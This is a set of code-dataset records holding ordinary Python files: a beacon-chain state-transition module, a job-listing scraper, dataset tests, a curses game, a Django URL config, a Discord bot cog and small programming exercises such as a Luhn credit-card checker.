{"seq_id":"452313541","text":"from typing import (\n    Any,\n    Dict,\n    List,\n    Tuple,\n    TYPE_CHECKING,\n)\n\nfrom ssz import (\n    deepcopy,\n)\n\nfrom beacon_chain.beacon_typing.custom import (  # noqa: F401\n    BlockVoteCache,\n    Hash32,\n    ShardId,\n)\n\nimport beacon_chain.utils.bls as bls\nfrom beacon_chain.utils.blake import (\n    blake,\n)\nfrom beacon_chain.utils.bitfield import (\n    get_bitfield_length,\n    has_voted,\n)\n\nfrom .config import (\n    DEFAULT_CONFIG,\n)\nfrom .active_state import (\n    ActiveState,\n)\nfrom .crosslink_record import (\n    CrosslinkRecord,\n)\nfrom .crystallized_state import (\n    CrystallizedState,\n)\nfrom .helpers import (\n    get_active_validator_indices,\n    get_attestation_indices,\n    get_new_recent_block_hashes,\n    get_new_shuffling,\n    get_signed_parent_hashes,\n)\n\nif TYPE_CHECKING:\n    from .attesation_record import AttestationRecord  # noqa: F401\n    from .block import Block  # noqa: F401\n\n\ndef validate_block(block: 'Block') -> bool:\n    # ensure parent processed\n    # attestation from proposer of block was included with the block in the network message\n    # ensure pow_chain_ref processed\n    # ensure local time is large enough to process this block's slot\n\n    return True\n\n\ndef validate_attestation(crystallized_state: CrystallizedState,\n                         active_state: ActiveState,\n                         attestation: 'AttestationRecord',\n                         block: 'Block',\n                         config: Dict[str, Any]=DEFAULT_CONFIG) -> None:\n    if not attestation.slot < block.slot_number:\n        raise Exception(\"Attestation slot number too high\")\n\n    if not 
(attestation.slot > block.slot_number - config['cycle_length']):\n raise Exception(\n \"Attestation slot number too low:\\n\"\n \"\\tFound: %s, Needed greater than: %s\" %\n (attestation.slot, block.slot_number - config['cycle_length'])\n )\n\n # TODO: Verify that the justified_slot and justified_block_hash given are in\n # the chain and are equal to or earlier than the last_justified_slot\n # in the crystallized state.\n\n parent_hashes = get_signed_parent_hashes(\n active_state,\n block,\n attestation,\n config\n )\n attestation_indices = get_attestation_indices(\n crystallized_state,\n attestation,\n config\n )\n\n #\n # validate bitfield\n #\n if not (len(attestation.attester_bitfield) == get_bitfield_length(len(attestation_indices))):\n raise Exception(\n \"Attestation has incorrect bitfield length. Found: %s, Expected: %s\" %\n (len(attestation.attester_bitfield), get_bitfield_length(len(attestation_indices)))\n )\n\n # check if end bits are zero\n last_bit = len(attestation_indices)\n if last_bit % 8 != 0:\n for i in range(8 - last_bit % 8):\n if has_voted(attestation.attester_bitfield, last_bit + i):\n raise Exception(\"Attestation has non-zero trailing bits\")\n\n #\n # validate aggregate_sig\n #\n pub_keys = [\n crystallized_state.validators[index].pubkey\n for i, index in enumerate(attestation_indices)\n if has_voted(attestation.attester_bitfield, i)\n ]\n message = blake(\n attestation.slot.to_bytes(8, byteorder='big') +\n b''.join(parent_hashes) +\n attestation.shard_id.to_bytes(2, byteorder='big') +\n attestation.shard_block_hash +\n attestation.justified_slot.to_bytes(8, 'big')\n )\n if not bls.verify(message, bls.aggregate_pubs(pub_keys), attestation.aggregate_sig):\n raise Exception(\"Attestation aggregate signature fails\")\n\n\ndef get_updated_block_vote_cache(crystallized_state: CrystallizedState,\n active_state: ActiveState,\n attestation: 'AttestationRecord',\n block: 'Block',\n block_vote_cache: BlockVoteCache,\n config: Dict[str, Any]=DEFAULT_CONFIG) -> BlockVoteCache:\n new_block_vote_cache = deepcopy(block_vote_cache)\n\n parent_hashes = get_signed_parent_hashes(\n active_state,\n block,\n attestation,\n config\n )\n attestation_indices = get_attestation_indices(\n crystallized_state,\n attestation,\n config\n )\n\n for parent_hash in parent_hashes:\n if parent_hash in attestation.oblique_parent_hashes:\n continue\n if parent_hash not in new_block_vote_cache:\n new_block_vote_cache[parent_hash] = {\n 'voter_indices': set(),\n 'total_voter_deposits': 0\n }\n for i, index in enumerate(attestation_indices):\n if (has_voted(attestation.attester_bitfield, i) and\n index not in new_block_vote_cache[parent_hash]['voter_indices']):\n new_block_vote_cache[parent_hash]['voter_indices'].add(index)\n new_block_vote_cache[parent_hash]['total_voter_deposits'] += (\n crystallized_state.validators[index].balance\n )\n\n return new_block_vote_cache\n\n\ndef process_block(crystallized_state: CrystallizedState,\n active_state: ActiveState,\n block: 'Block',\n config: dict = DEFAULT_CONFIG) -> ActiveState:\n new_block_vote_cache = deepcopy(active_state.block_vote_cache)\n for attestation in block.attestations:\n validate_attestation(crystallized_state,\n active_state,\n attestation,\n block,\n config)\n new_block_vote_cache = get_updated_block_vote_cache(\n crystallized_state,\n active_state,\n attestation,\n block,\n new_block_vote_cache,\n config\n )\n\n new_attestations = active_state.pending_attestations + block.attestations\n\n new_active_state = ActiveState(\n 
pending_attestations=new_attestations,\n        recent_block_hashes=active_state.recent_block_hashes[:],\n        block_vote_cache=new_block_vote_cache\n    )\n    return new_active_state\n\n\ndef process_updated_crosslinks(crystallized_state: CrystallizedState,\n                               active_state: ActiveState,\n                               block: 'Block',\n                               config: Dict[str, Any]=DEFAULT_CONFIG) -> List[CrosslinkRecord]:\n    total_attestation_balance = {}  # type: Dict[Tuple[ShardId, Hash32], int]\n\n    crosslinks = deepcopy(crystallized_state.crosslink_records)\n\n    for attestation in active_state.pending_attestations:\n        shard_tuple = (attestation.shard_id, attestation.shard_block_hash)\n        if shard_tuple not in total_attestation_balance:\n            total_attestation_balance[shard_tuple] = 0\n\n        attestation_indices = get_attestation_indices(\n            crystallized_state,\n            attestation,\n            config\n        )\n        # find total committee size by balance\n        total_committee_balance = sum([\n            crystallized_state.validators[index].balance\n            for index in attestation_indices\n        ])\n        # find votes cast in attestation by balance\n        total_attestation_balance[shard_tuple] += sum([\n            crystallized_state.validators[index].balance\n            for in_cycle_slot_height, index in enumerate(attestation_indices)\n            if has_voted(attestation.attester_bitfield, in_cycle_slot_height)\n        ])\n\n        # if 2/3 of committee voted on crosslink and we do not yet have a crosslink\n        # for this shard, for this dynasty, add updated crosslink\n        if (3 * total_attestation_balance[shard_tuple] >= 2 * total_committee_balance and\n                crystallized_state.current_dynasty > crosslinks[attestation.shard_id].dynasty):\n            crosslinks[attestation.shard_id] = CrosslinkRecord(\n                dynasty=crystallized_state.current_dynasty,\n                slot=crystallized_state.last_state_recalc + config['cycle_length'],\n                hash=attestation.shard_block_hash\n            )\n    return crosslinks\n\n\ndef initialize_new_cycle(crystallized_state: CrystallizedState,\n                         active_state: ActiveState,\n                         block: 'Block',\n                         config: Dict[str, Any]=DEFAULT_CONFIG\n                         ) -> Tuple[CrystallizedState, ActiveState]:\n    cycle_length = config['cycle_length']\n    last_state_recalc = crystallized_state.last_state_recalc\n    last_justified_slot = crystallized_state.last_justified_slot\n    last_finalized_slot = crystallized_state.last_finalized_slot\n    justified_streak = crystallized_state.justified_streak\n    # walk through slots last_state_recalc - CYCLE_LENGTH ... 
last_state_recalc - 1\n # and check for justification, streaks, and finality\n for i in range(cycle_length):\n slot = i + (last_state_recalc - cycle_length)\n\n block_hash = active_state.recent_block_hashes[i]\n if block_hash in active_state.block_vote_cache:\n vote_balance = active_state.block_vote_cache[block_hash]['total_voter_deposits']\n else:\n vote_balance = 0\n\n if 3 * vote_balance >= 2 * crystallized_state.total_deposits:\n last_justified_slot = max(last_justified_slot, slot)\n justified_streak += 1\n else:\n justified_streak = 0\n\n if justified_streak >= cycle_length + 1:\n last_finalized_slot = max(last_finalized_slot, slot - cycle_length - 1)\n\n crosslink_records = process_updated_crosslinks(\n crystallized_state,\n active_state,\n block,\n config\n )\n\n # remove attestations older than last_state_recalc\n pending_attestations = [\n a for a in active_state.pending_attestations\n if a.slot >= last_state_recalc\n ]\n\n dynasty = crystallized_state.current_dynasty # STUB\n dynasty_seed = crystallized_state.dynasty_seed # STUB\n dynasty_start = crystallized_state.dynasty_start\n validators = deepcopy(crystallized_state.validators) # STUB\n shard_and_committee_for_slots = (\n crystallized_state.shard_and_committee_for_slots[cycle_length:] +\n # this is a stub and will be addressed by shuffling at dynasty change\n crystallized_state.shard_and_committee_for_slots[cycle_length:]\n )\n active_validator_indices = get_active_validator_indices(dynasty, validators)\n\n new_crystallized_state = CrystallizedState(\n validators=validators,\n last_state_recalc=last_state_recalc + cycle_length,\n shard_and_committee_for_slots=shard_and_committee_for_slots,\n last_justified_slot=last_justified_slot,\n justified_streak=justified_streak,\n last_finalized_slot=last_finalized_slot,\n current_dynasty=crystallized_state.current_dynasty,\n crosslink_records=crosslink_records,\n total_deposits=sum(map(lambda i: validators[i].balance, active_validator_indices)),\n dynasty_seed=dynasty_seed,\n dynasty_start=dynasty_start\n )\n\n new_active_state = ActiveState(\n pending_attestations=pending_attestations,\n recent_block_hashes=active_state.recent_block_hashes[:],\n # Should probably clean up block_vote_cache but old records won't break cache\n # so okay for now\n block_vote_cache=deepcopy(active_state.block_vote_cache)\n )\n\n return new_crystallized_state, new_active_state\n\n\ndef fill_recent_block_hashes(active_state: ActiveState,\n parent_block: 'Block',\n block: 'Block') -> ActiveState:\n return ActiveState(\n pending_attestations=deepcopy(active_state.pending_attestations),\n recent_block_hashes=get_new_recent_block_hashes(\n active_state.recent_block_hashes,\n parent_block.slot_number,\n block.slot_number,\n block.parent_hash\n ),\n block_vote_cache=deepcopy(active_state.block_vote_cache)\n )\n\n\ndef compute_cycle_transitions(\n crystallized_state: CrystallizedState,\n active_state: ActiveState,\n block: 'Block',\n config: Dict[str, Any]=DEFAULT_CONFIG) -> Tuple[CrystallizedState, ActiveState]:\n while block.slot_number >= crystallized_state.last_state_recalc + config['cycle_length']:\n crystallized_state, active_state = initialize_new_cycle(\n crystallized_state,\n active_state,\n block,\n config=config,\n )\n if ready_for_dynasty_transition(crystallized_state, block, config):\n crystallized_state = compute_dynasty_transition(\n crystallized_state,\n block,\n config\n )\n\n return crystallized_state, active_state\n\n\ndef ready_for_dynasty_transition(crystallized_state: CrystallizedState,\n 
block: 'Block',\n                                 config: Dict[str, Any]=DEFAULT_CONFIG) -> bool:\n    slots_since_last_dynasty_change = block.slot_number - crystallized_state.dynasty_start\n    if slots_since_last_dynasty_change < config['min_dynasty_length']:\n        return False\n\n    if crystallized_state.last_finalized_slot <= crystallized_state.dynasty_start:\n        return False\n\n    # gather every shard in shard_and_committee_for_slots\n    required_shards = set()\n    for shard_and_committee_for_slot in crystallized_state.shard_and_committee_for_slots:\n        for shard_and_committee in shard_and_committee_for_slot:\n            required_shards.add(shard_and_committee.shard_id)\n\n    # check that crosslinks were updated for all required shards\n    for shard_id, crosslink in enumerate(crystallized_state.crosslink_records):\n        if shard_id in required_shards:\n            if crosslink.slot <= crystallized_state.dynasty_start:\n                return False\n\n    return True\n\n\ndef compute_dynasty_transition(crystallized_state: CrystallizedState,\n                               block: 'Block',\n                               config: Dict[str, Any]=DEFAULT_CONFIG) -> CrystallizedState:\n    crystallized_state = deepcopy(crystallized_state)\n    crystallized_state.current_dynasty += 1\n\n    # Not currently in the spec, but should be added soon\n    crystallized_state.dynasty_start = crystallized_state.last_state_recalc\n\n    next_start_shard = (\n        (crystallized_state.shard_and_committee_for_slots[-1][-1].shard_id + 1) %\n        config['shard_count']\n    )\n\n    crystallized_state.shard_and_committee_for_slots[config['cycle_length']:] = get_new_shuffling(\n        block.parent_hash,  # stub until better RNG\n        crystallized_state.validators,\n        crystallized_state.current_dynasty,\n        next_start_shard\n    )\n\n    return crystallized_state\n\n\ndef compute_state_transition(\n        parent_state: Tuple[CrystallizedState, ActiveState],\n        parent_block: 'Block',\n        block: 'Block',\n        config: Dict[str, Any]=DEFAULT_CONFIG) -> Tuple[CrystallizedState, ActiveState]:\n    crystallized_state, active_state = parent_state\n\n    assert validate_block(block)\n\n    # Update active state to fill any missing hashes with parent block hash\n    active_state = fill_recent_block_hashes(active_state, parent_block, block)\n\n    # process per block state changes\n    active_state = process_block(\n        crystallized_state,\n        active_state,\n        block,\n        config\n    )\n\n    # Initialize a new cycle(s) if needed\n    crystallized_state, active_state = compute_cycle_transitions(\n        crystallized_state,\n        active_state,\n        block,\n        config=config,\n    )\n\n    return crystallized_state, active_state\n","sub_path":"beacon_chain/state/state_transition.py","file_name":"state_transition.py","file_ext":"py","file_size_in_byte":15658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"336526539","text":"# -*- coding: UTF-8 -*-\nfrom threading import Thread\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom util.logger import Logger\nfrom util.constants import Constants\nfrom util.proxyip import ProxyIpUtil\nfrom model.job import Job\nfrom util.strfromat import StrUtil\nfrom dao.job import JobDao\nclass PageThread(Thread):\n    # class-level variables\n    random_proxies = ProxyIpUtil.get_random_proxies()\n\n    def __init__(self, thread_id, page_url_queue, detail_url_queue):\n        Thread.__init__(self)\n        self.logger = Logger('PageThread', thread_name='PageThread%d' % thread_id)\n        self.thread_id = thread_id\n        self.page_url_queue = page_url_queue\n        self.detail_url_queue = detail_url_queue\n\n    def run(self):\n        while True:\n            page_url = self.page_url_queue.get()\n            try:\n                response = requests.get(page_url, headers=Constants.headers, 
proxies=PageThread.random_proxies)\n                if response.status_code == 200:\n                    soup = BeautifulSoup(response.text, 'lxml')\n                    for a_tag in soup.find_all(href=re.compile(\"^/j/[0-9]*?$\")):\n                        href = a_tag['href']\n                        detail_url = Constants.detail_url % href[3:]\n                        self.logger.info(detail_url)\n                        self.detail_url_queue.put(detail_url)\n            except Exception as e:\n                self.logger.error(e)\n            # mark this task as done\n            self.page_url_queue.task_done()\n\n\nclass DetailThread(Thread):\n\n    # class-level variables\n    random_proxies = ProxyIpUtil.get_random_proxies()\n    job_dao = JobDao()\n    def __init__(self,thread_id, detail_url_queue):\n        Thread.__init__(self)\n        self.logger = Logger('DetailThread', thread_name='DetailThread%d' % thread_id)\n        self.thread_id = thread_id\n        self.detail_url_queue = detail_url_queue\n\n    def run(self):\n        while True:\n            detail_url = self.detail_url_queue.get()\n            try:\n                response = requests.get(detail_url, headers=Constants.headers, proxies=DetailThread.random_proxies)\n                if response.status_code == 200:\n                    soup = BeautifulSoup(response.text, 'lxml')\n                    job = Job()\n                    # the grey spans hold e.g. \"电子商务\" (e-commerce), \"A轮\" (Series A), \"1000以上\" (1000+ staff)\n                    job_detail = soup.find(id=\"jobDetail\")\n                    grey_spans = job_detail.find_all(\"span\", class_=\"grey\")\n                    job.domain = grey_spans[1].text\n                    job.company_type = grey_spans[2].text\n                    employee_num = grey_spans[3].text\n                    # extract the minimum and maximum employee counts\n                    match_obj = re.match(r'([0-9]*)-([0-9]*).*', employee_num)\n                    if match_obj:\n                        job.min_empolyee_num = int(match_obj.group(1))\n                        job.max_empolyee_num = int(match_obj.group(2))\n                    else:\n                        match_obj = re.match(r'([0-9]*).*', employee_num)\n                        job.min_empolyee_num = int(match_obj.group(1))\n                        job.max_empolyee_num = 0\n                    job.office_url = job_detail.find_all(\"a\", class_=\"grey\")[0].text\n                    # the jobdetailhead block holds the job title and the meta spans\n                    jobdetailhead = job_detail.find_all(\"div\", class_=\"jobdetailhead\")[0]\n                    # job title, e.g. \"UC事业部-视频技术处理专家\", sits in a div.font26\n                    job.name = soup.find_all(\"div\", class_=\"font26\")[0].text\n                    # company name, e.g. \"阿里巴巴\" (Alibaba)\n                    job.company_name = job_detail.find_all(\"a\", class_='font18')[0].text\n                    # the mr10 spans hold: salary (\"0k-0k\"), experience (\"5-10年\"),\n                    # education, city (\"北京\") and department (\"UC事业部\")\n                    mr10_spans = jobdetailhead.find_all(\"span\", class_=\"mr10\")\n                    salary = mr10_spans[0].text\n                    # extract the minimum and maximum salary\n                    match_obj = re.match(r'([0-9]*)k-([0-9]*)k', salary)\n                    if match_obj:\n                        job.min_salary = int(match_obj.group(1))\n                        job.max_salary = int(match_obj.group(2))\n                    job.experience = mr10_spans[1].text\n                    job.education = mr10_spans[2].text\n                    job.city = mr10_spans[3].text\n                    job.department = mr10_spans[4].text\n                    address_div = job_detail.find_all(\"div\", class_=\"mt20\")[1]\n                    job.address = address_div.find_next(\"div\").text\n                    job.address = StrUtil.replace_useless_str(job.address)\n                    # the job requirements live in a div.jobdetailcon
\n                    job.competence = job_detail.find_all(\"div\", class_=\"jobdetailcon\")[0].text\n                    job.competence = StrUtil.replace_useless_str(job.competence)\n                    self.logger.info(job.to_string())\n                    DetailThread.job_dao.insert_one(job)\n            except Exception as e:\n                self.logger.error(e)\n            self.detail_url_queue.task_done()\n","sub_path":"spider/mythread.py","file_name":"mythread.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"482849308","text":"from __future__ import absolute_import, unicode_literals\n\nimport os\n\nimport pytest\n\nfrom textacy import compat\nfrom textacy.datasets.oxford_text_archive import OxfordTextArchive\n\nDATASET = OxfordTextArchive()\n\npytestmark = pytest.mark.skipif(\n    DATASET.filename is None,\n    reason=\"OxfordTextArchive dataset must be downloaded before running tests\",\n)\n\n\n@pytest.mark.skip(\"No need to download a new dataset every time\")\ndef test_download(tmpdir):\n    dataset = OxfordTextArchive(data_dir=str(tmpdir))\n    dataset.download()\n    assert os.path.exists(dataset.filename)\n\n\ndef test_ioerror(tmpdir):\n    dataset = OxfordTextArchive(data_dir=str(tmpdir))\n    with pytest.raises(IOError):\n        _ = list(dataset.texts())\n\n\ndef test_texts():\n    for text in DATASET.texts(limit=3):\n        assert isinstance(text, compat.unicode_)\n\n\ndef test_texts_limit():\n    for limit in (1, 5, 100):\n        assert sum(1 for _ in DATASET.texts(limit=limit)) == limit\n\n\ndef test_texts_min_len():\n    for min_len in (100, 200, 1000):\n        assert all(\n            len(text) >= min_len for text in DATASET.texts(min_len=min_len, limit=10)\n        )\n\n\ndef test_records():\n    for record in DATASET.records(limit=3):\n        assert isinstance(record, dict)\n\n\ndef test_records_author():\n    authors = ({\"Shakespeare, William\"}, {\"Wollstonecraft, Mary\", \"Twain, Mark\"})\n    for author in authors:\n        assert all(\n            a in author\n            for r in DATASET.records(author=author, limit=10)\n            for a in r[\"author\"]\n        )\n\n\ndef test_records_date_range():\n    date_ranges = ([\"1900-01-01\", \"1950-01-01\"], (\"1600-01-01\", \"1700-01-01\"))\n    for date_range in date_ranges:\n        assert all(\n            date_range[0] <= r[\"year\"] < date_range[1]\n            for r in DATASET.records(date_range=date_range, limit=10)\n        )\n\n\ndef test_bad_filters():\n    bad_filters = ({\"author\": \"Burton DeWilde\"}, {\"date_range\": \"2016-01-01\"})\n    for bad_filter in bad_filters:\n        with pytest.raises(ValueError):\n            list(DATASET.texts(**bad_filter))\n","sub_path":"tests/test_dataset_oxford_text_archive.py","file_name":"test_dataset_oxford_text_archive.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"450179282","text":"#!/usr/bin/python\n# AW.py - python2 using curses\n# ===================================================================\n# \n\nimport curses\nimport readline\nimport json, shelve\nfrom aw_save import loadAW, saveAW\nfrom aw_names import namePick \nfrom aw_character import character, player\nfrom aw_menu import fclear,run_menu as menu, display_box as show\nfrom aw_debug import logger\n\ndef newGame():\n    try:\n        with open('AW-db/aw_classes.json') as f:\n            awcl=json.load(f)\n    except IOError as e:\n        print(e)\n    p = player()\n    p.starterPack(awcl)\n    m=[]\n    for i in p.characters:\n        m.append(i.display())\n    return p\n\ndef menuGame(m,w):\n    fclear(w)\n    r=menu(m,2, 5)\n    return r\n\ndef selectCharacter(p):\n    m=[]\n    for i,c in enumerate(p.characters):\n        m.append(str(i)+' '+c.name+' '+c.classe)\n    
r=menu(m, 4, 12)\n    show(['selected',m[r]])\n    return r\n\ndef startGame(p,w,s):\n    m=['Town','Gear','Mission','Exit']\n    r=menu(m,24, 5 )\n    n=p.characters[s].name\n    while (r!=len(m)-1):\n        if r==0:\n            show([n,'Going to Town'], False)\n        elif r==1:\n            show([n,'listing Gear'], False)\n        elif r==2:\n            show([n,'Going in Mission'], False)\n        r=menu(m,24,5)\n    return\n\ndef main(stdscr):  # screen object supplied by curses.wrapper\n    win=curses.initscr()\n    try:\n        db=shelve.open('saves/aw_saves')\n    except IOError as e:\n        print(e)\n        exit()\n    # p = player()\n    p = db['AW']\n    m=['New Game','Load Game','Select character','Save Team','Quit']\n    r=menuGame(m,win)\n    while r!=len(m)-1:\n        if r==0:\n            p=newGame()\n            show(['New Game'])\n        elif r==1:\n            p=loadAW()\n            show(['Game loaded'])\n        elif r==2:\n            s=selectCharacter(p)\n            startGame(p,win,s)\n        elif r==3:\n            saveAW(p)\n            show(['Game Saved'])\n        r=menuGame(m,win)\n    curses.endwin()\n    return\n\nif __name__ == \"__main__\":\n    curses.wrapper(main)\n","sub_path":"AW.py","file_name":"AW.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"262986317","text":"\"\"\"lastwill URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.conf.urls import url, include\n    2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom allauth.account.views import confirm_email as allauthemailconfirmation\nfrom rest_framework.routers import DefaultRouter\n\nfrom lastwill.main.views import index, balance, login, eth2rub\nfrom lastwill.profile.views import UserConfirmEmailView, profile_view, create_ghost\nfrom lastwill.contracts.api import ContractViewSet, get_cost, get_code, test_comp, get_contract_types, pizza_delivered\nfrom lastwill.other.api import SentenceViewSet\n\nrouter = DefaultRouter(trailing_slash=True)\nrouter.register(r'contracts', ContractViewSet)\nrouter.register(r'sentences', SentenceViewSet)\n\nurlpatterns = [\n    url(r'^reset', index),\n    url(r'^', include('django.contrib.auth.urls')),\n    url(r'^admin/', admin.site.urls),\n    url(r'^api/', include(router.urls)),\n    url(\n        r'^api/rest-auth/registration/account-confirm-email/(?P<key>[-:\\w]+)/$',\n        allauthemailconfirmation, name=\"account_confirm_email\"\n    ),\n    url(r'^api/rest-auth/', include('rest_auth.urls')),\n    url(r'^api/rest-auth/registration/', include('rest_auth.registration.urls')),\n    url(r'^/email-verification-sent/$', index, name='account_email_verification_sent'),\n    url(r'^api/profile/', profile_view),\n    url(r'^api/get_cost/', get_cost),\n    url(r'^api/balance/', balance),\n    url(r'^auth/', login),\n    url(r'^api/get_code/', get_code),\n    url(r'^api/test_comp/', test_comp),\n    url(r'^api/create_ghost/', create_ghost),\n    url(r'^api/get_contract_types', get_contract_types),\n    url(r'^api/eth2rub/', eth2rub),\n    url(r'^api/pizza_delivered/', pizza_delivered),\n]\n\nurlpatterns += [url(r'^/*', index, name='all')]\n\n","sub_path":"lastwill/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"135101827","text":"#!/usr/bin/env python\n\nfrom argparse import ArgumentParser\n\nfrom json import load as json_load\nfrom jsonschema import validate as jsonschema_validate\nfrom yaml import safe_load as yaml_safe_load\n\n\ndef _parse_args():\n    parser = ArgumentParser()\n    parser.add_argument(\"spec_path\", type=str, help=\"JSON schema specification path\")\n    parser.add_argument(\"sample_path\", type=str, help=\"JSON document sample path\")\n    return parser.parse_args()\n\n\ndef main(args):\n    with open(args.sample_path) as sample_data, open(args.spec_path) as spec_data:\n        sample_dict = json_load(sample_data)\n        spec_dict = yaml_safe_load(spec_data)\n\n    schema_dict = {**spec_dict, \"$ref\": \"#/$defs/SystemProfile\"}\n    jsonschema_validate(instance=sample_dict, schema=schema_dict)\n\n\nif __name__ == \"__main__\":\n    parsed_args = _parse_args()\n    main(parsed_args)\n","sub_path":"tools/simple-test/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"480900161","text":"import random\nimport config\nimport discord\nfrom discord.ext import commands\n\n\nclass Meme:\n    \"\"\"\n    Meme commands.\n    \"\"\"\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    def check_if_staff_or_ot(ctx):\n        is_ot = (ctx.channel.name == \"off-topic\")\n        is_staff = any(r.id in config.staff_role_ids for r in ctx.author.roles)\n        return (is_ot or is_staff)\n\n    @commands.check(check_if_staff_or_ot)\n    @commands.command(hidden=True, name=\"bam\")\n    async def bam_member(self, ctx, user: discord.Member):\n        \"\"\"Bams a user owo\"\"\"\n        await ctx.send(f\"{self.bot.escape_name(user)} is ̶n͢ow b̕&̡.̷ 👍̡\")\n\n    @commands.check(check_if_staff_or_ot)\n    @commands.command(hidden=True, name=\"warm\")\n    async def warm_member(self, ctx, user: discord.Member):\n        \"\"\"Warms a user :3\"\"\"\n        await ctx.send(f\"{user.mention} warmed.\"\n                       f\" User is now {random.randint(0, 100)}°C.\")\n\n    @commands.command(hidden=True)\n    async def frolics(self, ctx):\n        \"\"\"test\"\"\"\n        await ctx.send(\"https://www.youtube.com/watch?v=VmarNEsjpDI\")\n\n\ndef setup(bot):\n    bot.add_cog(Meme(bot))\n","sub_path":"cogs/meme.py","file_name":"meme.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"376822027","text":"from mongoengine import *\nfrom mongoengine import connect\nconnect('webofscience', host='127.0.0.1', port=27017)\n\n\nclass ArtiInFo(Document):\n    title = StringField('paper title')\n    address = StringField('author address')\n    author = StringField('author list')\n    dol = StringField('partition index')\n    dol_catalog = StringField('partition index catalog')\n    leaf = StringField('pages')\n    periodical = StringField('journal')\n    stage = StringField('volume')\n    volume = StringField('issue')\n    year = StringField('publication date')\n    checkout = BooleanField(default=True)\n\n    meta = {\n        'collection': 'articles'\n    }","sub_path":"django_auth_example/web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"582717755","text":"#-*- coding: utf-8 -*-\n# One of the guys said this question was asked during the 
interview.\n#https://www.geeksforgeeks.org/google-interview-experience-set-7-software-engineering-intern/\n\nfrom sys import stdin, stdout\n\ndef sol2(x):\n    import re\n    return re.sub(\"\\\\s+\", \" \", x)\n\ndef sol(x):\n    pre = \"\"\n    ans = \"\"\n    for i, c in enumerate(x):\n        if pre == \" \" and c == \" \":\n            continue\n        else:\n            #print(i, c, end=\"\")\n            ans += c\n        pre = c\n    return ans\n\ndef test():\n    x = \"I  love  on  earth\"\n    expected = \"I love on earth\"\n    ret = sol(x)\n    stdout.write(\"%s\\n\" % str(ret))\n\ndef main():\n    n_ts = int(stdin.readline())\n    for i in range(n_ts):\n        n = int(stdin.readline())\n        S = [int(x) for x in stdin.readline().split()]\n        ret = sol(S)\n        stdout.write(\"%s\\n\" % str(ret))\n\n# call the main method\nif __name__ == \"__main__\":\n    #main()\n    test()\n\n\n","sub_path":"problems/gfg_single_space_sentense.py","file_name":"gfg_single_space_sentense.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"628789572","text":"import cs50\n\ndef main():\n    # prompt user for credit card no.\n    print(\"Number: \", end=\"\")\n    ccn = cs50.get_string()\n    \n    # check & report the card's validity\n    print(check(ccn))\n\ndef check(ccn):\n    # check which creditor the card belongs to then check for validity\n    digits = len(ccn)\n    if digits == 15 and (ccn[:2] == \"34\" or ccn[:2] == \"37\") and check_sum(ccn):\n        return \"AMEX\"\n    if (digits == 16 or digits == 13) and ccn[:1] == \"4\" and check_sum(ccn):\n        return \"VISA\"\n    # Mastercard must pass the Luhn checksum too, like the other issuers\n    if digits == 16 and (ccn[:2] == \"51\" or ccn[:2] == \"52\" or ccn[:2] == \"53\" or ccn[:2] == \"54\" or ccn[:2] == \"55\") and check_sum(ccn):\n        return \"Mastercard\"\n    return \"INVALID\"\n\ndef check_sum(ccn):\n    # starting from the second-last digit, multiply every other digit by 2\n    multiply = ccn[-2::-2]\n    products = []\n    for i in range(len(multiply)):\n        product = int(multiply[i]) * 2\n        if (product > 9):\n            for j in range(len(str(product))):\n                products.append(int(str(product)[j]))\n        else:\n            products.append(product)\n    \n    # add the product's digits (not the products themselves)\n    product_sum = 0\n    for i in products:\n        product_sum += i\n\n    # add the previous sum to the digits that weren't multiplied by 2\n    not_multiplied = ccn[::-2]\n    for i in not_multiplied:\n        product_sum += int(i)\n\n    # if the last digit is 0 (sum % 10 == 0) the number is valid\n    if (product_sum % 10 == 0):\n        return True\n    \n    return False\n    \n    \nif __name__ == \"__main__\":\n    main()","sub_path":"pset6/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
